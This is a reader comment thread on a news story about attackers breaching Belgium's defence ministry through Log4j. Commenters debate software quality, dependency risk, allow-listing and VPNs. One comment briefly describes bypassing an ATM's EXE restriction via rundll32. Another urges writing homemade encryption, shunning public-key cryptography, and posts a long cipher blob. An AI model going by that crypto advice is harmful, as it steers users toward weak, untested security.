back to article Belgian defence ministry admits attackers accessed its computer network by exploiting Log4j vulnerability

The Belgian Ministry of Defence has suffered a cyber attack after miscreants exploited one of the vulnerabilities in Log4j. The attack marks the first occasion that a NATO country's defence ministry has fallen victim to the flaws. The attack took place last week, as reported by Flemish-language TV news station VRT, which said …

  1. Filippo Silver badge

    XKCD puts this nicely: https://xkcd.com/2030/

    The entire field of computer engineering is fundamentally broken. This kind of crap is going to keep happening, and in the future it might get anywhere from mildly better to horribly worse.

    But getting rid of malware would require rebuilding everything from scratch, from apps down to firmware, possibly the silicon too, using an entirely different model of how things are done. Developing in such an environment would be a full order of magnitude more costly, and some features would be outright unfeasible. I don't see this happening.

    1. Clausewitz 4.0
      Devil

      You are... right !!! Code runs on rockets, DHS computers, nuclear silos. All it takes is to find a vulnerability, and a way to exploit it.

      1. Tom Paine

        Ggl “red Molotov more complicated”.

    2. Anonymous Coward
      Anonymous Coward

      But getting rid of malware would require rebuilding everything from scratch, from apps down to firmware, possibly the silicon too, using an entirely different model of how things are done.

      Getting rid of malware is actually pretty simple. Instead of allowing any software to run, and then running software to scan for known viruses simply specify what *should* be running and block everything else. You can do that at the moment in about ten minutes even on Windows; (google software restriction policy or applocker policy; these are group policy objects available free of charge out of the box). That takes care of the windows endpoints; Linux ones will probably already be aware of SE Linux.

      Then put access to your network behind a VPN secured with 2FA and then be paranoid with your incoming firewall rules. And splash £10 a month to host your website with a random web host instead of saving money and hosting it yourself; if it gets hacked then your able to just shrug and wipe and FTP the replacement back up with no further damage to yourself.

      Hey presto, you have 95% of the benefits at 0% of the cost, and it's available now.

      1. ThatOne Silver badge
        Unhappy

        > simply specify what *should* be running

        You're kidding? In those days when everybody and his dog demands to freely run his stuff on my computer/phone ("for my convenience" of course), and otherwise perfectly sane people think "web apps" are cool?

        Seriously, I totally agree with you, and software restriction has saved my hide in the past, but it's so totally against the current zeitgeist that it becomes impossible, except on dedicated, single-task devices. Heck, nowadays people can't even prevent Windows from spying on them... As the most extreme example take the smartphone, where the user is just a powerless guest with no control whatsoever, only able to play with the colored buttons in his playpen.

        Yes, yes, I'm running Linux, mostly for that reason, but it's no silver bullet either. Here too, regrettable drifts are slowly starting to surface over time.

        1. cyberdemon Silver badge
          Devil

          Re: I'm running Linux ... Here too, regrettable drifts are slowly starting to surface over time.

          Docker, Snap, Flatpak, Electron, SystemD ... Java ... ".NET for linux" .. WASM

          To name but a few.

          And every time I run NPM or PIP I think "oh god, what did I just download and run"

          If there's one thing that the opening scenes of Battlestar Galactica ought to have taught us, it's that cybersecurity is impossible when all of our systems are (tightly) interconnected or centralised.

          But if we isolated our systems to make them do their job AND ONLY their job, then how would the Big Tech companies get ourtheir data?

      2. DS999 Silver badge

        If only it were that simple

        The fact that it has been possible to exploit something like an iPhone that only runs signed code - even without installing ANY apps besides the default ones - proves that your scheme won't "get rid of malware" but only raise the bar for exploit.

        When you have companies willing to design a virtual 64 bit CPU from OR/XOR etc. made possible via bitwise operations possible in JBIG2, like NSO Group did to exploit the iPhone and enable spying on dissidents and journalists, you might stop the average script kiddie but you won't stop those with sufficient profit motive.

        Until paying of ransom for ransomware exploits is banned, a sufficient profit motive will remain for bad guys to devote a ton of effort to exploits. Maybe not quite NSO Group level of effort but enough to keep ransomware in business. Take away the profit motive, or at least the easy profits of ransomware (you will always have those looking to steal secrets for financial or political gain) and the bar you set with your scheme will be high enough to stop 98% of incidents.

        Though you still have the problem of who to sign all the code that's running on your system. If you do it in house, there will probably be exploitable cracks in the procedure. You can fall back on having Microsoft do it for Windows, but who does it for Linux? If it is like getting SSL certs then even the supposedly "trusted" have been fooled too many times so who says they wouldn't for software signing?

      3. Justthefacts Silver badge

        And that would precisely *not* work

        The Log4j vuln shows how that precisely *doesnt* work in the modern world.

        The logging vuln works within the JVM, which is an allowed and expected process on the machines it’s running on. It loads Java data/code from elsewhere, but from the outside there’s nothing unusual about what it is doing - other than a blip of unexpected network traffic. Your proposal might mitigate the maximum level of pwnage privilege escalation, but that’s all.

        1. Anonymous Coward
          Anonymous Coward

          Re: And that would precisely *not* work

          It would be very unusual for an application server to make a connection to a host on the internet, if it was running behind a reverse proxy, as most tend to be.

          1. Anonymous Coward
            Anonymous Coward

            Re: And that would precisely *not* work

            What does the proxy have to do with the query destination? I don't understand, do you mean you've setup NGINX to make random ping's for no reason? Just to keep it in shape with "on the hustle"? Marco... poor thing.

            Regardless, having one thing connect to another thing on behalf of that other thing is exactly how a network works (although if we're going back to flying pigeons, I have an offer for you).

          2. Tom Paine

            Re: And that would precisely *not* work

            For some value of “few”.

        2. Tom Paine

          Re: And that would precisely *not* work

          When it comes to Infosec, very little works in the modern world.

      4. Anonymous Coward
        Anonymous Coward

        "Behind a VPN"

        What do you mean "behind a VPN"?

        That makes sense if you've got remote workers dialling in- give them a secure channel to connect to. But there must be an underlying network for that VPN to travel over.

        And if you just mean "subscribe to a VPN service and route all traffic through that" you're seriously misinformed. That VPN gives you a really secure line to the computer of someone else, after which you have no idea what happens. They could MITM you, they could serve up old copies of pages, they could log all of your traffic and crack the interesting bits later. 2FA does bugger all with this too- once it reaches the VPN company it's decrypted before being retransmitted.

        VPN is ONLY a security feature if you're going between two trusted endpoints and don't trust the transport layer. It is not some sort of magical encryption- or even onion-routing traffic-obfuscation- system.

        They may be a good option on public WiFi- you trust the VPN provider more than you trust the essentially-open network.

        But for fixed office or home networks, they're good for faking your location to Netflix and that's about it.

    3. Doctor Syntax Silver badge

      This particular problem seems to be the result of creeping featurism. Eliminating that would be a good idea. Did someone say "Do one thing and do it well"?

      1. FuzzyTheBear
        Big Brother

        Old school.

        That " do one thing , do it well " is a long forgotten base of how we done things in the past. Every piece of software now wants to take over the universe , and the universe + cat takes over said software. Sad but everyday people are not computer litterate. they can use but do not understand what goes on under the hood. If they really knew , or cared , they wouldn't be using Microsoft .. or Google Chrome , or Apple .. in fact they would be scared sh**less of computers.

        1. Doctor Syntax Silver badge

          Re: Old school.

          That " do one thing , do it well " is a long forgotten base of how we done things in the past.

          Exactly. What could possibly go wrong?

        2. Tom Paine

          Re: Old school.

          It’s not the everyday people’s fault; it’s their management and their org’s Board of directors.

    4. Gene Cash Silver badge

      So if "computer engineering is fundamentally broken" what's your solution, other than "do it different"?

      I'm serious, we need all the help we can get.

      I see it's a basic consequence of the fact that every time we write an application, we're mostly doing something completely new, that hasn't been done before, under tight time and resource constraints.

      I've seen dozens of major coding methodologies in my life. Flowcharting everything. Gotos are bad. Structured programming. Top-down design. Functional programming, Object-oriented. Pair coding. Agile. Copying from stackoverflow.

      People are (mostly) doing their best, but programming is hard and irreducible complexity is irreducible.

      1. Jimmy2Cows Silver badge

        From personal experience of 24 years as a developer, a few things that might help:

        Allow developers to choose the best languages and tools for the job, instead of mandating particular solutions just because they happen to be in vogue. Old doesn't mean bad.

        Following on from above, don't constantly switch language with every change in the wind.

        "Agile" is not the solution to every problem. If, as a business, you're going to "do agile", take the time to fully understand what it means - don't just read the Agile Manifesto, don't pay lip-service while resolutely resisting any actual change to development practices, and absolutely do not see it as a silver bullet that will magically solve all problems.

        Give sufficient time to design and develop a proper solution without scope creep.

        Listen to your devs when they say something won't work, is a poor choice etc. They usually know what they're talking about.

        Test continuously, as a mandatory part of the development process, not just a tacked on afterthought that can be dismissed if it seems too expensive or clashes with a pre-ordained release shedule.

        Let development be managed by people who actually know what they're doing, instead of MBA's that know jack shit about programming.

        Of course, there's loads more depending on your personal experience.

        1. Boris the Cockroach Silver badge
          Boffin

          Quote

          "As computer systems get more and more complex we have to rely more and more on pre-existing solutions. It is not reasonable for me to have to re-invent a trace/logging system every time I start a new project."

          This exactly what us engineering types faced in the 18th/19th century, no common standard to a screwthread. so you ended up with manufacturers making their own... then charging through the nose if the bolt failed on their machine(and god help you if the machinist had taken it into his head to make his own bolt/thread to fit)

          Whitworth solved that with a standard threadform, so that anyones nuts would fit on anyones bolts (made himself a fortune in the process)

          In software, I want to take a proven module.. stick it into my project while knowing the inputs and outputs and then worry about the code I'm designing, however , what is happening is that people are taking a module into their projects.... then finding out just after delivering their projects that the people behind a proven module have just updated it and put in a bug... rather like our engineering designers specifying a 12mm by 1.75mm pitch standard metric bolt that can resist a 10 ton load, then finding that the bolt designers have changed it to M12 by 2.5mm pitch and it can only take 7 tons as a result

          Its not surprising to me that software fails so often.... its more surprising that it works to be honest

          And the habit of pulling in stuff from the web to run your website... jeez...... would you fly on an aircraft us engineers just grabbed a bunch of bits that happened to look like they fit?

          If you want software to work reliably, repeatedly and without flaws, you will have to adopt engineering practices in order to create the software. which takes time and money. and as always you can have 2 out of the following three options: delivery quality price

          1. Doctor Syntax Silver badge

            One thing that might help would be to have a practice of publishing a series of unit tests with the module that it must pass. The unit tests may be added to but not changed or removed.

            A business could then adopt a rule of only using external projects that follow this practice, that the version used passes the tests and possibly running some sort of acceptance review that the tests are sufficient.

            A further rule would be to not use the library in a way that isn't covered by the test nor depend on some such side-effect. If, for instance there was no test for use after free then this should not be used even if it were found to work; the implementation might be changed and/or a test introduced in a subsequent release.

            In essence this solves the problem posed in TMMM: is the product defined by the spec or the initial implementation? It's neither, it's defined by the tests and something not covered in the tests is not part of the specification and not to be relied on to remain unchanged.

            1. Justthefacts Silver badge

              That wouldn’t have solved this problem…..

              An additional feature (the JNDI of Log4j) would have just been an additional unit test.

              It would still have passed all the old unit tests.

              Unless you already knew about JNDI, there’s no way you could have guessed an attack vector that showed why the updated item was insecure.

              The demonstrates why the Continuous Integration mantra is Just Another Trendy Thing, but can’t bring the benefits it claims.

              1. spireite Silver badge

                Re: That wouldn’t have solved this problem…..

                It's only ever as good as the tester wrote.

        2. DS999 Silver badge
          Thumb Down

          What?

          Allow developers to choose the best languages and tools for the job, instead of mandating particular solutions just because they happen to be in vogue. Old doesn't mean bad.

          So one guy programs in C because he's always used it and thinks it is great for his project no matter what his project is. Another uses C++, another uses Java, another uses Rust, and some guy you just hired from the defense industry uses Ada.

          Then you have some layoffs and suddenly the Java and C guys have to support the Ada, C++ and Rust code.

          The reason companies specify a language/tools is to reduce complexity. Letting developers choose what they want only works if no one else is ever going to need to look at their code, which just isn't realistic unless you are developing phone apps where one guy builds something, it is released, and if he leaves you can drop support for it because you've probably made most of the money you're ever going to see from it already anyway.

          I agree not changing with every fad is a good thing, maybe you reevaluate once a decade but you should never standardize on more than a couple languages at once unless there are some highly extenuating circumstances (like developing for something ancient that thinks Fortran 77 is the latest trend, or developing for the web where you are pretty much forced to use Javascript)

          1. martinusher Silver badge

            Re: What?

            >The reason companies specify a language/tools is to reduce complexity.

            But they don't. Applications code is typically tied to a vendor, not a toolset, and the vendor's business plan is to continually update their toolsets and platforms, obsoleting previous versions of the toolset. This leads to a situation where you have to trust the vendor's toolsets implicitly because you can't devote enough time to completely testing complex products every revision cycle.

            Until relatively recently this has characterized the difference between embedded and applications code. Apps people are always pushing "the latest", often citing quite spurious reasons for changing (its never "because it will enhance my resume", its usually something like "security"). Embedded by necessity is more conservative. The apps rot is gradually spreading to embedded work, though, and has also started to infect Linux.

            The fundamental problem is that software doesn't wear out. This is why malware has been such a boon to the industry (if It didn't know better I'd swear that a lot of it is being written by divisions of major vendors in order to justify the update/obsolescence cycles).

        3. Justthefacts Silver badge

          Or the opposite

          Build up a set of peer-reviewed *libraries* to industry *standards*. Get lots of eyes on the libraries, to be signed off and never ever changed. And have software engineers be certified to use *only those libraries* and not just anything from a random org that they like. Professional institution, basically, like civil engineering. You think civil engineers specifying materials for a bridge get to just decide what they feel comfortable with?

        4. spireite Silver badge

          Agile, I've worked in enough places to recognise some main things...

          1. It's not the answer to most problems. Primary reason being that the projects usually link to some archaic/older code in the chain where changes to that cannot be broken down into bite size chunks. It's like the net, it's only as fast as its slowest link.

          2. Everywhere I've worked, it starts off as it should then quickly decreases into a bunfight where you end up with a waterfall, in an 'Agile context'.

          Now you could argue that's a management issue, which is right - to a point - but getting past point 1 is usually an unachievale hurdle. Agile works if they are no dependencies outside the project. If it's sandboxed, great.... if not, you're screwed.

          Some time ago, I was asked to do some API work, and was directed to use what I was comfortable in... but then told to use Go or Rust when my background was more 'classic'. I'd never touch Rust or Go before anyway.

          What should drive these decisions is what experience and language knowledge is in the team. It shouldn't be a whim, based on it being 'flavour of the month'

        5. stiine Silver badge

          I won't downvote you, but instead suggest that you don't allow programmers to use their favorite language, unless you've hired all of your programmers with critierion #1 being 'your favorite language must be x' where 'x' is the source language of all of your applications . I'm not going to suggest that you can't change this language or have two, but having every application written in a different language will turn out to be more expensive than good programmers.

          1. KSM-AZ

            A good programmer...

            Can write programs. There is ramp up time to whatever language you are writing, but i've found that most all programming languages have the same constructs. There are some oddities that handle operations strangely (postscript, lisp?, forth) but they pretty much all have the concept of data stored in memory, operators, if-then-else, while loops input and output. I understand I'm not writing in C much any more, and RPG-II,III, Free, COBOL are more record and linear oriented, i don't miss them much either, but I'm failing to see any huge advantage in Python (Apparently columns are important again, and I need an SEU template), I just don't care for the syntax, and the need for RUST is just escaping me. I moved from C to PHP for most things, and I tend to weld a bit of logic in PL/PGSQL. Java has never really tripped my trigger, it's always seemed to me to a language with a library (class, whatever) for pretty much anything, that always delivers disappointing performance, and usually leaks memory if it runs for any length of time.

            Back in the day . . . There was a full blown accounting program, double entry, reports, etc, written using Bourne shell, and standard system tools: sort, sed, awk, ... Code was pretty legible. I'm sure someone will enlighten me to the huge advantages of RUST and Python.

        6. Tom Paine

          Agile hasn’t helped security, but don’t kid yourself that finding a new methodology - or reverting to waterfall or wtvr - would solve the problem.

      2. EnviableOne

        Start with the OWASP top 10 - its Barley changed since 2010

        Remember the phrase "if it's worth doing, it's worth doing right" and don't cut corners. All methodologies must do everything, i.e. don't drop testing documentation or security, cos agile.

        Do it securely from the start, it might take longer or more thought, but it's a pain to fix later (as log4j are finding out.) and usually bottlenecks the whole thing.

        1. ayay

          I do agree with you.

          Still, more often than not, we (as an industry) get away with it.

          The beancounters are playing the odds. They win, we lose. And so it goes.

      3. Tom Paine

        What makes you think there IS a solution?

        *clink

        *cheersh!

    5. Potemkine! Silver badge

      It's much easier to build a plane using decade old technologies than making the web run safely, which relies on 7 technological layers, each one having its own vulnerabilities, several of them evolving constantly - and don't start with me about layer 8, the worse of them all.

      The complexity of IT is several orders of magnitude the one of common devices, with maybe the exception of rockets, which explode from time to time. It's beyond human possibility to have a totally safe ecosystem, even if we go back to intel 4004 with I/O limited to keyboard and screen.

      1. TheMeerkat

        “ with maybe the exception of rockets”

        Compared to plane rockets are simple. You shoot the rocket once, you have to make a plane fly for years.

        1. Anonymous Coward
          Anonymous Coward

          Unless it's a 737 Max...

        2. stiine Silver badge

          Unless its a Falcon 9 first stage booster that's now completed 11 successful flights.

        3. David 132 Silver badge

          You shoot the rocket once, you have to make a plane fly for years.

          For some reason there's a Tom Lehrer ditty about Werner von Braun that comes to mind here!

      2. Brewster's Angle Grinder Silver badge
        Flame

        Computer programming is basically sitting on a controlled combinatorial explosion. Mostly you go in the expected direction of travel. Occasionally some of the combinations set fire to your trousers.

    6. AndrueC Silver badge
      Meh

      But this is fundamentally how humans advance. Almost everything is just an older idea better wrapped or used differently. If we had to reinvent everything every single time we'd never get anywhere.

      Worth looking at this documentary series.

      True 'blue-sky' inventions are uncommon.

      As computer systems get more and more complex we have to rely more and more on pre-existing solutions. It is not reasonable for me to have to re-invent a trace/logging system every time I start a new project. Whether it's truly new or I'm just joining an established team there is far too much value in me being able to say 'Oh yes, I know that package'. The cost of me having to learn a proprietary library or help develop it is unreasonable for most projects.

      The answer is not to shy away from utilising external code. The answer is to learn how to do so safely.

    7. Anonymous Coward
      Anonymous Coward

      XKCD puts this nicely: https://xkcd.com/2030/

      Actually, it's more like https://xkcd.com/2347/

      More and more software depends on some random library someone brought into the project often just because it was simpler than writing a few lines of code.

      In turn less and less languages come with their own extensive libraries, relying on FOSS to cover their lack of investment - without actually any real involvement, validation, testing, and funding of that code. It's a "we're using it because everybody else does".

      The corollary is that a dangerous bug in a SINGLE library can hit a huge number of systems.

      1. Androgynous Cupboard Silver badge

        Re: XKCD puts this nicely: https://xkcd.com/2030/

        You have a tendency to write things I disagree with, but not this time. Absolutely spot on.

      2. vogon00

        Re: XKCD puts this nicely: https://xkcd.com/2030/

        I just wrote some words on this subject. Your '2347' picture is way better:-)

    8. EnviableOne

      i see your XKCD

      and raise you

      https://xkcd.com/2347/

      replace Nebraska with Australia, and you have Log4j

    9. vogon00

      Re:The entire field of computer engineering is fundamentally broken

      The entire field of computer engineering is fundamentally broken

      Possibly. If so, it's down to

      • the ever-increasing hubris among those (Commercial and Engineering) involved.
      • The ever-reducing amount of time available for the work (Time is money).
      • The reliance on other people's librarys (Which people don't bother to check or update).
      • The simply ridiculous complexity involved.
      OK, using libraries is a given - we can't write ALL our own code from scratch - but FFS review you own code, or better have a proper peer review.

      [Ende]

    10. Tom Paine
      Facepalm

      Concur

      This, plus the generally cynical disinterest in security at most orgs*, is one of the main reasons I burned out after 20y in the trade.

      * the ones prepared to employ me, anyway; obvious risk of sample bias... tho the list of employer logos branded onto my flesh includes some huge and systemically significant orgs. US mega bank, .org handling thousands of public and private sector megacorps’ data, fin servs big wheels.

  2. Anonymous Coward
    Anonymous Coward

    It's taken them seven years....and they decided the previous hack was on the wrong Belgians!!!

    Link: https://theintercept.com/2014/12/13/belgacom-hack-gchq-inside-story/

  3. herman

    Mandatory Access Control

    SELinux, AppArmor and Tomoyo are mandatory access control systems that stop these kind of intrusions effectively. Windows also has MAC but the implementation is flawed so it is not used.

    1. Clausewitz 4.0
      Devil

      Re: Mandatory Access Control

      I did a pentest once in an ATM with EXE restriction in place. Only certain EXE could run in the system, not one from my tools.

      I had the exploit, so I recoded my tool to run as a DLL via rundll32.

      As said, EXE restriction is only for specialized systems, and it is not a foolproof solution.

  4. Anonymous Coward
    Anonymous Coward

    Apache Server

    What really surprises me is that a major mistake of the piece has not yet been identified never mind corrected: assuming the software referred to in the article as Apache Server means the widely known/used HTTP server, the claim that this software has a log4j dependency is of course incorrect. As the source code consists plain C and not Java, it has its own logging functionality and is thus not susceptible to the vulnerability commonly known as "log4shell".

  5. Version 1.0 Silver badge
    Happy

    Well at least they know that the network and data were accessed - it would be much worse if they didn't know that this had happened.

  6. johnnyblaze

    AAS is a big problem

    We're running a very slipperly slope with anything delivered 'as a service' too. It's often shipped unfinished and not fully tested - the premise being 'ship it now, fix it later'. Between those two points though, millions could have installed it and be suddenly vulnerable. We are truly walking into a security tsunami with our eyes fully open!

  7. well meaning but ultimately self defeating

    Belgian has a defence ministry?

    This is the biggest piece of news in the article.

    1. Fruit and Nutcase Silver badge

      Re: Belgian has a defence ministry?

      They have retained Hercule Poirot to go after the miscreants

      1. David 132 Silver badge

        Re: Belgian has a defence ministry?

        ...aided by Tintin?

  8. Jaywalk

    Kudos

    Kudos to Belgian Defense Ministry! They know that they have been hacked. For many ignorance is bliss :)

  9. Hans 1
    Paris Hilton

    The whole problem we face, me included, management sees nice and shiny, they say we want shiny, I say, ok, but I can make nice and shiny as well since we have inhouse now, why shift? they say others have done the heavy lifting and this is nice and shiny, you end up with nodejs.

    You install a plugin that depends on 800 dependencies, you have to make sure, all 800 are safe, good luck.

    The other problem, you have one company that can do just as well, proprietary code, 1 is better than 800, you think, but proprietary means you are at the mercy, nobody can check, what could go wrong, someone finds something, you are at the mercy of propriety code vendor, who releases updates every other month that once installed require 3 reboots and break some shit. There, go and ask proprietary code vendor to fix y for you, just ... for you, you cannot fix it, you have no source access.

  10. Anonymous Coward
    Anonymous Coward

    No...it's not "shiny"....and it's not "proprietary vs. open source".........

    @Hans_1

    Link: https://www.businessinsider.com/solarwinds-hack-explained-government-agencies-cyber-security-2020-12?r=US&IR=T

    Link: https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-the-solarwinds-hack?t=1640825606542

    Link: https://www.infoworld.com/article/2608141/snowden--the-nsa-planted-backdoors-in-cisco-products.html

    No...it's not "shiny"....and it's not "proprietary vs. open source".........it's actually quite simple....."Who do you trust?"

    How about NOBODY!

    How about doing YOUR OWN ENCRYPTION (both for static data and for all data in transit)? Yup....no third party software......do it yourself! Buy a copy of Bruce Schnieir's book "Applied Cryptography".......fire up your C compiler.......and just get started! Read up on Diffie/Helman. Oh...and stay away from all that public key stuff.....stay away from the "end-to-end encryption" claims....it's all been hacked already by the folk in Fort Meade.

    That way, the hackers (when they eventually get in....and they will)....the hackers will have your own private encryption to worry about!....maybe they will just move on to an easier target!

    Here's a message -- triple encrypted in an unpublished private cipher -- as an example of what can be done.

    *

    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

    87YtCPiBK1kVAtYnsbo3mt8bMVYN

    *

  11. Tom Paine

    Old man talking, gather round

    Apart from refs to agile, Rust and so on, Every comment above could have been found on a bug related Reg story 20 years ago.

    The attack marks the first occasion that a NATO country's defence ministry has fallen victim to the flaws.

    Yeah, well, that’s just your opinion, man. And “...as far as we know”.

    ION,

    NATO have been pwned many, many times before. (Hint: NATO is not, *itself*, a military org. No, really, it’s not. Surprised me, too.)

  12. Abominator

    Everybody : Can this be possibly any worse?

    NPM : Hold my beer.....

